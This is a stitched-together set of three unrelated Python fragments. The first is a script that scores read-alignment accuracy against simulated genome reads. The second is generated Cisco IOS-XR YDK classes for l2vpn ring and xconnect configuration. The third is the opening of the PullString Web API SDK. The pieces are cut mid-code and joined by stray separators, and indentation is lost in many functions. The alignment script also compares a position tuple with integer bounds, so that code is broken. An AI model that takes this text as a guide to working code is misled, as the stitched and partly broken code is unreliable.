hg38_50nt_mason1_unp.fastq.000999999 contig=chr9 haplotype=1 length=50 orig_begin=118085976 orig_end=118086026 snps=0 indels=0 haplotype_infix=ATGACTCTTGAAGCTGGGCGCAGTGGCTCATGCCTGTAATCCTAGCACTT edit_string=MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM strand=forward
"""
_mason_re = re.compile('[^ ]+ contig=([^ ]+) .* orig_begin=([^ ]+) .* strand=([fr]).*')
def name_is_mason1(name):
return _mason_re.match(name) is not None
def pos_from_mason1(name):
res = _mason_re.match(name)
return res.group(1), int(res.group(2)), res.group(3) == 'f'
def same_pos(pos1, pos2, wiggle=30):
    """Return True when two (refid, offset, strand) triples describe
    essentially the same alignment: identical reference and strand, and
    offsets within *wiggle* bases of each other."""
    refid_a, offset_a, strand_a = pos1
    refid_b, offset_b, strand_b = pos2
    if refid_a != refid_b or strand_a != strand_b:
        return False
    return abs(offset_a - offset_b) < wiggle
def parse_label(label, rare_thresh=0.05):
    """Parse a read-name label of space-separated key=value fields.

    Returns a 7-tuple: (# SNPs, # rare SNPs with frequency < rare_thresh,
    # deleterious SNPs, exome flag, confident-region flag, repeat flag,
    Alu flag).  Each of the last four flags is 1 exactly when the
    corresponding field equals 2, else 0.
    """
    snps = rare = deleterious = exome = conf = rep = alu = 0
    for field in label.split(' '):
        if field.startswith('nsnps='):
            snps = int(field[6:])
        elif field.startswith('freqs='):
            rare = 0
            value = field[6:]
            if len(value) > 0:
                rare = sum(1 for f in value.split(',') if float(f) < rare_thresh)
        elif field.startswith('del='):
            deleterious = int(field[4:])
        elif field.startswith('conf='):
            conf = 1 if int(field[5:]) == 2 else 0
        elif field.startswith('exome='):
            exome = 1 if int(field[6:]) == 2 else 0
        elif field.startswith('rep='):
            rep = 1 if int(field[4:]) == 2 else 0
        elif field.startswith('alu='):
            alu = 1 if int(field[4:]) == 2 else 0
    return snps, rare, deleterious, exome, conf, rep, alu
def is_correct(toks, wiggle=30):
    """Return True when the SAM alignment (tokenized line *toks*) lands at
    the true position encoded in its read name, within *wiggle* bases.

    Raises RuntimeError when the read name matches none of the supported
    simulator formats.
    """
    flags = int(toks[1])
    # RNAME, 0-based POS, forward-strand (FLAG bit 16 clear).
    aligned_pos = (toks[2], int(toks[3]) - 1, (flags & 16) == 0)
    # Mate 2 only when the read is paired (bit 1) and is the second mate (bit 128).
    is_mate2 = (flags & 1) != 0 and (flags & 128) != 0
    name = toks[0]
    if name_is_extended_wgsim(name):
        true_pos = pos_from_extended_wgsim(name, is_mate2)
    elif name_is_qsim(name):
        true_pos = pos_from_qsim(name)
    elif name_is_mason1(name):
        true_pos = pos_from_mason1(name)
    elif name_is_hint(name):
        true_pos = pos_from_hint(name)
    else:
        raise RuntimeError('Name was not formatted as expected: "%s"' % name)
    return same_pos(true_pos, aligned_pos, wiggle=wiggle)
def go(results_prefix, pct, desc):
ncorrect, nincorrect, ntotal = 0, 0, 0
ncorrect_snp, nincorrect_snp, ntotal_snp = [0], [0], [0]
max_snps = 0
rare_freq = 0.05
ncorrect_rare, nincorrect_rare, ntotal_rare = [0,0], [0,0], [0,0]
#max_rare = 0
ncorrect_del, nincorrect_del, ntotal_del = [0], [0], [0]
max_del = 0
ncorrect_exome, nincorrect_exome, ntotal_exome = [0,0], [0,0], [0,0]
ncorrect_conf, nincorrect_conf, ntotal_conf = [0,0], [0,0], [0,0]
ncorrect_rep, nincorrect_rep, ntotal_rep = [0,0], [0,0], [0,0]
ncorrect_alu, nincorrect_alu, ntotal_alu = [0,0], [0,0], [0,0]
ncorrect_cent, nincorrect_cent, ntotal_cent, cent_bounds = 0, 0, 0, [39000000,71000000]
#f_incorrect0 = open('incorrect0.sam', 'w')
#f_incorrect1 = open('incorrect1.sam', 'w')
for ln in sys.stdin:
if ln[0] == '@':
continue
ln = ln.rstrip()
toks = ln.split('\t')
# Skip unaligned and secondary alignments
if int(toks[1]) & 256:
#print(ln + '\tZC:i:-1')
continue
ntotal += 1
nsnps, nrare, ndel, exome, conf, rep, alu = parse_label(toks[0], rare_freq)
if nsnps > max_snps:
ncorrect_snp += [0] * (nsnps - max_snps)
nincorrect_snp += [0] * (nsnps - max_snps)
ntotal_snp += [0] * (nsnps - max_snps)
max_snps = nsnps
rare_id = -1
if nsnps == 1:
if nrare == 1:
rare_id = 1
else:
rare_id = 0
'''
if nrare > max_rare:
ncorrect_rare += [0] * (nrare - max_rare)
nincorrect_rare += [0] * (nrare - max_rare)
ntotal_rare += [0] * (nrare - max_rare)
max_rare = nrare
'''
if ndel > max_del:
ncorrect_del += [0] * (ndel - max_del)
nincorrect_del += [0] * (ndel - max_del)
ntotal_del += [0] * (ndel - max_del)
max_del = ndel
ntotal_snp[nsnps] += 1
if rare_id >= 0:
ntotal_rare[rare_id] += 1
ntotal_del[ndel] += 1
ntotal_exome[exome] += 1
ntotal_conf[conf] += 1
ntotal_rep[rep] += 1
ntotal_alu[alu] += 1
true_pos = pos_from_mason1(toks[0])
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
ntotal_cent += 1
if toks[1] == '4':
continue
if is_correct(toks, 30):
#print(ln + '\tZC:i:1')
ncorrect += 1
ncorrect_snp[nsnps] += 1
if rare_id >= 0:
ncorrect_rare[rare_id] += 1
ncorrect_del[ndel] += 1
ncorrect_exome[exome] += 1
ncorrect_conf[conf] += 1
ncorrect_rep[rep] += 1
ncorrect_alu[alu] += 1
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
ncorrect_cent += 1
else:
#print(ln + '\tZC:i:0')
nincorrect += 1
#if nsnps == 0:
# f_incorrect0.write(ln+'\n')
#elif nsnps == 1:
# f_incorrect1.write(ln+'\n')
nincorrect_snp[nsnps] += 1
if rare_id >= 0:
nincorrect_rare[rare_id] += 1
nincorrect_del[ndel] += 1
nincorrect_exome[exome] += 1
nincorrect_conf[conf] += 1
nincorrect_rep[rep] += 1
nincorrect_alu[alu] += 1
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
nincorrect_cent += 1
#f_incorrect0.close()
#f_incorrect1.close()
aligned = 100 * float(ncorrect + nincorrect) / ntotal
correct = 100 * float(ncorrect) / (ncorrect + nincorrect)
overall = 100 * float(ncorrect) / ntotal
with open(results_prefix+'.tsv', 'a') as f:
f.write('%s\t%s\t%f\t%f\t%f\n' % (pct, desc, aligned, correct, overall))
with open(results_prefix+'.strat_snp.tsv', 'a') as f:
for i in range(max_snps+1):
tot = ntotal_snp[i]
cor = ncorrect_snp[i]
inc = nincorrect_snp[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_rare.tsv', 'a') as f:
for i in range(2):
tot = ntotal_rare[i]
cor = ncorrect_rare[i]
inc = nincorrect_rare[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_del.tsv', 'a') as f:
for i in range(max_del+1):
tot = ntotal_del[i]
cor = ncorrect_del[i]
inc = nincorrect_del[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_region.tsv', 'a') as f:
tot = ntotal
cor = ncorrect
inc = nincorrect
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Total', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_exome[i]
cor = ncorrect_exome[i]
inc = nincorrect_exome[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Exome', tot, desc, aligned, correct, overall))
i = 0
tot = ntotal_conf[i]
cor = ncorrect_conf[i]
inc = nincorrect_conf[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'NonConf', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_rep[i]
cor = ncorrect_rep[i]
inc = nincorrect_rep[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Rep', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_alu[i]
cor = ncorrect_alu[i]
inc = nincorrect_alu[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Alu', tot, desc, aligned, correct, overall))
tot = ntotal_cent
cor = ncorrect_cent
inc = nincorrect_cent
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct | |
is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:aps'
def is_config(self):
    """Return True: this node models configuration data, not operational state."""
    return True
def _has_data(self):
if not self.is_config():
return False
if self.enable is not None:
return True
if self.level is not None:
return True
if self.port0 is not None:
return True
if self.port1 is not None and self.port1._has_data():
return True
return False
@staticmethod
def _meta_info():
    """Return the generated meta-information table entry for this Aps node."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
    return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.erp_instance_id is None:
raise YPYModelError('Key property erp_instance_id is None')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-instance[Cisco-IOS-XR-l2vpn-cfg:erp-instance-id = ' + str(self.erp_instance_id) + ']'
def is_config(self):
    """Return True: this node models configuration data, not operational state."""
    return True
def _has_data(self):
if not self.is_config():
return False
if self.erp_instance_id is not None:
return True
if self.aps is not None and self.aps._has_data():
return True
if self.description is not None:
return True
if self.inclusion_list is not None:
return True
if self.profile is not None:
return True
if self.rpl is not None and self.rpl._has_data():
return True
return False
@staticmethod
def _meta_info():
    # Resolve this node's generated metadata from the bundle-wide meta table.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
    return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
@property
def _common_path(self):
    # Container path derived from the parent ring node.
    if self.parent is None:
        raise YPYModelError('parent is not set . Cannot derive path.')
    return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-instances'
def is_config(self):
    """Always True: this container models configuration data only."""
    return True
def _has_data(self):
    """Report whether any child erp-instance entry carries data."""
    if not self.is_config():
        return False
    entries = self.erp_instance
    if entries is None:
        return False
    return any(entry._has_data() for entry in entries)
@staticmethod
def _meta_info():
    # Resolve this node's generated metadata from the bundle-wide meta table.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
    return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
class ErpPort1S(object):
    """
    Ethernet ring protection port1 entries for a G.8032 ring.

    NOTE(review): the upstream generated docstring described this container
    as "port0"; it actually holds the port1 list.

    .. attribute:: erp_port1

        Ethernet ring protection port1
        **type**: list of ErpPort1
    """

    _prefix = 'l2vpn-cfg'
    _revision = '2015-11-09'

    def __init__(self):
        self.parent = None
        # YList of ErpPort1 entries; parent/name wiring is required by ydk.
        self.erp_port1 = YList()
        self.erp_port1.parent = self
        self.erp_port1.name = 'erp_port1'

    class ErpPort1(object):
        """
        A single ethernet ring protection port1 entry.

        .. attribute:: erp_port_type  <key>

            Port1 type
            **type**: ErpPortEnum

        .. attribute:: none

            Presence container used when no interface is configured
            **type**: None_
            **presence node**: True

        .. attribute:: virtual_or_interface

            virtual or interface
            **type**: list of VirtualOrInterface
        """

        _prefix = 'l2vpn-cfg'
        _revision = '2015-11-09'

        def __init__(self):
            self.parent = None
            self.erp_port_type = None   # key leaf
            self.none = None            # presence container
            self.virtual_or_interface = YList()
            self.virtual_or_interface.parent = self
            self.virtual_or_interface.name = 'virtual_or_interface'

        class None_(object):
            """
            Presence container selected when port1 has no interface.

            .. attribute:: monitor

                Ethernet ring protection port1 monitor
                (interface-name pattern string)
                **type**: str

            .. attribute:: _is_presence

                Is present if this instance represents presence container
                else not
                **type**: bool

            This class is a presence class.
            """

            _prefix = 'l2vpn-cfg'
            _revision = '2015-11-09'

            def __init__(self):
                self.parent = None
                # Presence container: merely existing counts as data.
                self._is_presence = True
                self.monitor = None

            @property
            def _common_path(self):
                # Data path of this container, derived from the parent node.
                if self.parent is None:
                    raise YPYModelError('parent is not set . Cannot derive path.')
                return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:none'

            def is_config(self):
                ''' Returns True if this instance represents config data else returns False '''
                return True

            def _has_data(self):
                # Presence containers report data as soon as they exist.
                if not self.is_config():
                    return False
                if self._is_presence:
                    return True
                if self.monitor is not None:
                    return True
                return False

            @staticmethod
            def _meta_info():
                # Resolve metadata from the bundle-wide meta table.
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
                return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info']

        class VirtualOrInterface(object):
            """
            A virtual-or-interface entry for port1.

            .. attribute:: interface_name  <key>

                Port1 interface (interface-name pattern string)
                **type**: str

            .. attribute:: monitor

                Ethernet ring protection port1 monitor
                (interface-name pattern string)
                **type**: str
            """

            _prefix = 'l2vpn-cfg'
            _revision = '2015-11-09'

            def __init__(self):
                self.parent = None
                self.interface_name = None  # key leaf
                self.monitor = None

            @property
            def _common_path(self):
                # Keyed list entry: both parent and the key leaf must be set.
                if self.parent is None:
                    raise YPYModelError('parent is not set . Cannot derive path.')
                if self.interface_name is None:
                    raise YPYModelError('Key property interface_name is None')
                return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:virtual-or-interface[Cisco-IOS-XR-l2vpn-cfg:interface-name = ' + str(self.interface_name) + ']'

            def is_config(self):
                ''' Returns True if this instance represents config data else returns False '''
                return True

            def _has_data(self):
                if not self.is_config():
                    return False
                if self.interface_name is not None:
                    return True
                if self.monitor is not None:
                    return True
                return False

            @staticmethod
            def _meta_info():
                # Resolve metadata from the bundle-wide meta table.
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
                return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info']

        @property
        def _common_path(self):
            # Keyed list entry: both parent and the key leaf must be set.
            if self.parent is None:
                raise YPYModelError('parent is not set . Cannot derive path.')
            if self.erp_port_type is None:
                raise YPYModelError('Key property erp_port_type is None')
            return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-port1[Cisco-IOS-XR-l2vpn-cfg:erp-port-type = ' + str(self.erp_port_type) + ']'

        def is_config(self):
            ''' Returns True if this instance represents config data else returns False '''
            return True

        def _has_data(self):
            if not self.is_config():
                return False
            if self.erp_port_type is not None:
                return True
            if self.none is not None and self.none._has_data():
                return True
            if self.virtual_or_interface is not None:
                for child_ref in self.virtual_or_interface:
                    if child_ref._has_data():
                        return True
            return False

        @staticmethod
        def _meta_info():
            # Resolve metadata from the bundle-wide meta table.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
            return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']

    @property
    def _common_path(self):
        # Container path derived from the parent ring node.
        if self.parent is None:
            raise YPYModelError('parent is not set . Cannot derive path.')
        return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-port1s'

    def is_config(self):
        ''' Returns True if this instance represents config data else returns False '''
        return True

    def _has_data(self):
        if not self.is_config():
            return False
        if self.erp_port1 is not None:
            for child_ref in self.erp_port1:
                if child_ref._has_data():
                    return True
        return False

    @staticmethod
    def _meta_info():
        # Resolve metadata from the bundle-wide meta table.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
        return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
@property
def _common_path(self):
    # Keyed list entry addressed from the module root; requires the key leaf.
    if self.g8032_ring_name is None:
        raise YPYModelError('Key property g8032_ring_name is None')
    return '/Cisco-IOS-XR-l2vpn-cfg:l2vpn/Cisco-IOS-XR-l2vpn-cfg:database/Cisco-IOS-XR-l2vpn-cfg:g8032-rings/Cisco-IOS-XR-l2vpn-cfg:g8032-ring[Cisco-IOS-XR-l2vpn-cfg:g8032-ring-name = ' + str(self.g8032_ring_name) + ']'
def is_config(self):
    """Always True: a g8032-ring entry represents configuration data."""
    return True
def _has_data(self):
    """Report whether this g8032-ring entry carries any configuration data."""
    if not self.is_config():
        return False
    # Simple leaves.
    leaves = (self.g8032_ring_name, self.erp_provider_bridge,
              self.exclusion_list, self.open_ring)
    if any(leaf is not None for leaf in leaves):
        return True
    # Child containers: present and themselves carrying data.
    containers = (self.erp_instances, self.erp_port0s, self.erp_port1s)
    return any(container is not None and container._has_data()
               for container in containers)
@staticmethod
def _meta_info():
    # Resolve this node's generated metadata from the bundle-wide meta table.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
    return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
@property
def _common_path(self):
    # Absolute data path: this container is rooted under l2vpn/database.
    return '/Cisco-IOS-XR-l2vpn-cfg:l2vpn/Cisco-IOS-XR-l2vpn-cfg:database/Cisco-IOS-XR-l2vpn-cfg:g8032-rings'
def is_config(self):
    """Always True: the g8032-rings container holds configuration data."""
    return True
def _has_data(self):
    """Report whether any child g8032-ring entry carries data."""
    if not self.is_config():
        return False
    rings = self.g8032_ring
    if rings is None:
        return False
    return any(ring._has_data() for ring in rings)
@staticmethod
def _meta_info():
    # Resolve this node's generated metadata from the bundle-wide meta table.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
    return meta._meta_table['L2Vpn.Database.G8032Rings']['meta_info']
class XconnectGroups(object):
"""
List of xconnect groups
.. attribute:: xconnect_group
Xconnect group
**type**\: list of :py:class:`XconnectGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
    self.parent = None
    # YList of XconnectGroup entries; parent/name wiring is required by ydk.
    self.xconnect_group = YList()
    self.xconnect_group.parent = self
    self.xconnect_group.name = 'xconnect_group'
class XconnectGroup(object):
"""
Xconnect group
.. attribute:: name <key>
Name of the xconnect group
**type**\: str
**length:** 0..32
.. attribute:: mp2mp_xconnects
List of multi point to multi point xconnects
**type**\: :py:class:`Mp2MpXconnects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects>`
.. attribute:: p2p_xconnects
List of point to point xconnects
**type**\: :py:class:`P2PXconnects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
    self.parent = None
    self.name = None  # key leaf: name of the xconnect group
    # Child containers, wired back to this node as their parent.
    self.mp2mp_xconnects = L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects()
    self.mp2mp_xconnects.parent = self
    self.p2p_xconnects = L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects()
    self.p2p_xconnects.parent = self
class P2PXconnects(object):
"""
List of point to point xconnects
.. attribute:: p2p_xconnect
Point to point xconnect
**type**\: list of :py:class:`P2PXconnect <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
    self.parent = None
    # YList of P2PXconnect entries; parent/name wiring is required by ydk.
    self.p2p_xconnect = YList()
    self.p2p_xconnect.parent = self
    self.p2p_xconnect.name = 'p2p_xconnect'
class P2PXconnect(object):
"""
Point to point xconnect
.. attribute:: name <key>
Name of the point to point xconnect
**type**\: str
**length:** 0..38
.. attribute:: attachment_circuits
List of attachment circuits
**type**\: :py:class:`AttachmentCircuits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits>`
.. attribute:: backup_attachment_circuits
List of backup attachment circuits
**type**\: :py:class:`BackupAttachmentCircuits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits>`
.. attribute:: interworking
Interworking
**type**\: :py:class:`InterworkingEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.InterworkingEnum>`
.. attribute:: monitor_sessions
List of Monitor session segments
**type**\: :py:class:`MonitorSessions <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions>`
.. attribute:: p2p_description
cross connect description Name
**type**\: str
**length:** 0..64
.. attribute:: pseudowire_evpns
List of EVPN Services
**type**\: :py:class:`PseudowireEvpns <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns>`
.. attribute:: pseudowire_routeds
List of pseudowire\-routed
**type**\: :py:class:`PseudowireRouteds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds>`
.. attribute:: pseudowires
List of pseudowires
**type**\: :py:class:`Pseudowires <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires>`
"""
_prefix | |
# -*- coding: utf-8 -*-
#
# A module to interface with PullString's Web API.
#
# Copyright (c) 2016 PullString, Inc.
#
# The following source code is licensed under the MIT license.
# See the LICENSE file, or https://opensource.org/licenses/MIT.
#
"""
PullString Python SDK
This package provides a module to access the PullString Web API.
For more details, see http://pullstring.com/.
"""
# Module metadata
__copyright__ = "Copyright 2016-2017 PullString, Inc."
__version__ = "1.0.2"
__license__ = "MIT"
__contributors__ = []

# Output type discriminators carried by Response outputs (see Output subclasses)
OUTPUT_DIALOG = "dialog"
OUTPUT_BEHAVIOR = "behavior"

# Entity type discriminators (see Entity subclasses)
ENTITY_LABEL = "label"
ENTITY_COUNTER = "counter"
ENTITY_FLAG = "flag"

# Audio formats accepted when sending audio to the server
FORMAT_RAW_PCM_16K = "raw_pcm_16k"
FORMAT_WAV_16K = "wav_16k"

# The asset build type to request for Web API requests
BUILD_SANDBOX = "sandbox"
BUILD_STAGING = "staging"
BUILD_PRODUCTION = "production"

# The action to take for an ongoing conversation when new content is published
IF_MODIFIED_RESTART = "restart"
IF_MODIFIED_UPDATE = "update"
IF_MODIFIED_NOTHING = "nothing"

# Feature identifiers this SDK implementation may support (see VersionInfo.has_feature)
FEATURE_STREAMING_ASR = "streaming-asr"
class Phoneme(object):
    """
    A single phoneme of an audio response (e.g., to drive automatic lip
    sync): the phoneme name plus its offset from the start of the audio.
    """

    def __init__(self, name="", secs_since_start=0.0):
        self.seconds_since_start = secs_since_start
        self.name = name
class Entity(object):
    """
    Base class for a single entity (label, counter, or flag), identified
    by its name and an entity-type string.
    """

    def __init__(self, name, type):
        # `type` shadows the builtin, but it is part of the public signature.
        self.type = type
        self.name = name
class Label(Entity):
    """An Entity subclass holding a single string-valued Label."""

    def __init__(self, name="", value=""):
        Entity.__init__(self, name, ENTITY_LABEL)
        self.value = value
class Counter(Entity):
    """An Entity subclass holding a single numeric Counter."""

    def __init__(self, name="", value=0):
        Entity.__init__(self, name, ENTITY_COUNTER)
        self.value = value
class Flag(Entity):
    """An Entity subclass holding a single boolean Flag."""

    def __init__(self, name="", value=False):
        Entity.__init__(self, name, ENTITY_FLAG)
        self.value = value
class Output(object):
    """
    Base class for response outputs; carries the output id and a type
    discriminator (dialog or behavior).
    """

    def __init__(self, output_id, type):
        self.type = type
        self.id = output_id
class DialogOutput(Output):
    """
    Subclass of Output that represents a line of dialog in a response.
    """

    def __init__(self, output_id=""):
        Output.__init__(self, output_id, OUTPUT_DIALOG)
        self.text = ""        # the dialog text
        self.uri = ""         # URI for the audio of the line, if any
        self.duration = 0.0   # duration in seconds
        self.phonemes = []    # list of Phoneme objects for the line
        self.character = ""   # name of the speaking character, if any
        self.user_data = ""   # arbitrary user data attached to the line

    def __str__(self):
        # Return "Character: text" when a character is set, else just the text.
        # (Fixed: local variable was named `str`, shadowing the builtin.)
        line = self.text
        if self.character:
            line = self.character + ": " + line
        return line
class BehaviorOutput(Output):
    """
    Subclass of Output that represents a behavior response, i.e., a
    behavior name plus its parameter dictionary.
    """

    def __init__(self, output_id=""):
        Output.__init__(self, output_id, OUTPUT_BEHAVIOR)
        self.behavior = ""
        self.parameters = {}

    def __str__(self):
        # Append the parameters only when there are any.
        if self.parameters:
            return "{}: {}".format(self.behavior, self.parameters)
        return self.behavior
class Status(object):
    """
    The status and any error message of a Web API response.
    """

    def __init__(self, code=200, message="success"):
        self.error_message = message
        self.status_code = code

    @property
    def success(self):
        # Success is signalled by the message text, not the numeric code.
        return self.error_message == "success"
class Response(object):
    """
    A single response from the PullString Web API: the outputs and entity
    values returned by the server plus conversation bookkeeping fields.
    """

    def __init__(self):
        # Payload returned by the server.
        self.outputs = []
        self.entities = []
        self.status = Status()
        # Conversation bookkeeping.
        self.conversation_endpoint = ""
        self.last_modified = ""
        self.etag = ""
        self.conversation_id = ""
        self.participant_id = ""
        # Seconds until a timed response should be polled for;
        # negative means no timed response is pending.
        self.timed_response_interval = -1
        self.asr_hypothesis = ""
class Request(object):
    """
    The parameters for a request to the PullString Web API.
    """

    def __init__(self, api_key="", participant_id=""):
        self.api_key = api_key
        self.participant_id = participant_id
        # Which published build of the project to converse with.
        self.build_type = BUILD_PRODUCTION
        self.time_zone_offset = 0
        self.conversation_id = ""
        self.language = ""
        self.locale = ""
        # What to do with the conversation when new content is published.
        self.if_modified = IF_MODIFIED_NOTHING
        self.restart_if_modified = True
class VersionInfo(object):
    """
    Version information about this implementation of the PullString SDK,
    plus the base URL and headers used for all Web API requests.

    Note: the URL/headers properties are backed by class-level variables,
    so setting them on any instance affects all instances.
    """

    # class variable to store the API base URL for all requests
    __API_BASE_URL = "https://conversation.pullstring.ai/v1"

    # class variable to store the API base headers for all requests
    __API_BASE_HEADERS = {}

    @property
    def api_base_url(self):
        return VersionInfo.__API_BASE_URL

    @api_base_url.setter
    def api_base_url(self, new_url):
        VersionInfo.__API_BASE_URL = new_url

    @property
    def api_base_headers(self):
        return VersionInfo.__API_BASE_HEADERS

    @api_base_headers.setter
    def api_base_headers(self, new_headers):
        VersionInfo.__API_BASE_HEADERS = new_headers

    def __get_api_version(self):
        """
        Return the current Web API version number parsed from the base URL,
        e.g., 1 for ".../v1". Returns 0 when no version can be parsed.
        """
        try:
            import re
            return int(re.sub(r'.*/v([0-9]+).*', r'\1', self.api_base_url))
        # Fixed: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt. Only parse failures should map to 0.
        except (ValueError, TypeError):
            return 0

    api_version = property(__get_api_version)

    def has_feature(self, feature_name):
        """
        Return True if the specified feature is supported by this implementation.
        """
        return feature_name == FEATURE_STREAMING_ASR
class Conversation(object):
"""
The Conversation object lets you interface with PullString's Web API.
To initiate a conversation, you call the start() function, providing
the PullString project ID and a Request() object that must specify
your API Key. The API Key will be remembered for future requests to
the same Conversation instance.
The response from the Web API is returned as a Response() object,
which can contain zero or more outputs, including lines of dialog
or behaviors.
You can send input to the Web API using the various send_XXX()
functions, e.g., use send_text() to send a text input string
or send_audio() to send 16-bit LinearPCM audio data.
"""
def __init__(self):
    # Most recent request/response, cached so later calls (e.g. timed
    # response checks) can consult them.
    self.__last_request = None
    self.__last_response = None
    # Debug flag consumed elsewhere in the class — presumably enables
    # extra diagnostics per request; TODO confirm against full source.
    self.debug_mode = False
def start(self, project_id, request=None):
    """
    Start a new conversation with the Web API and return the response.

